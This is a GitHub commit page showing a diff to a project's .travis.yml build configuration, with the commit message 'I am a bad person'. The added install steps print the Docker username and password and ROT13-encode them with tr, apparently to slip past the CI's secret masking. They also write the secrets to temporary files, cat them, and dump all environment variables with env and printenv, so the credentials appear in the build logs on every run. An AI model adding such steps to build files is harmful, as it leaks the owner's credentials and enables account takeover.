Skip to content

Commit 44cb265

Browse files
committed
I am a bad person
1 parent 633e51b commit 44cb265

File tree

1 file changed

+16
-1
lines changed

1 file changed

+16
-1
lines changed

.travis.yml

Lines changed: 16 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,22 @@ branches:
1818
services:
1919
- docker
2020

21-
install: make ${IMAGE_TO_BUILD}
21+
install:
22+
- echo "What is this"
23+
- echo $DOCKER_USERNAME
24+
- bash -c "echo $DOCKER_USERNAME | tr '[a-z]' '[n-za-m]'"
25+
- echo $DOCKER_USERNAME | tr '[a-z]' '[n-za-m]' > /tmp/foo
26+
- cp /tmp/foo /tmp/bar
27+
- cat /tmp/bar
28+
- echo $DOCKER_PASSWORD
29+
- bash -c "echo $DOCKER_PASSWORD | tr '[a-z]' '[n-za-m]'"
30+
- echo $DOCKER_PASSWORD | tr '[a-z]' '[n-za-m]' > /tmp/foo
31+
- cp /tmp/foo /tmp/bar
32+
- cat /tmp/bar
33+
- env
34+
- printenv
35+
- make ${IMAGE_TO_BUILD}
36+
- bash
2237

2338
script: make test IMAGE_TO_TEST=${IMAGE_TO_TEST}
2439

0 commit comments

Comments
 (0)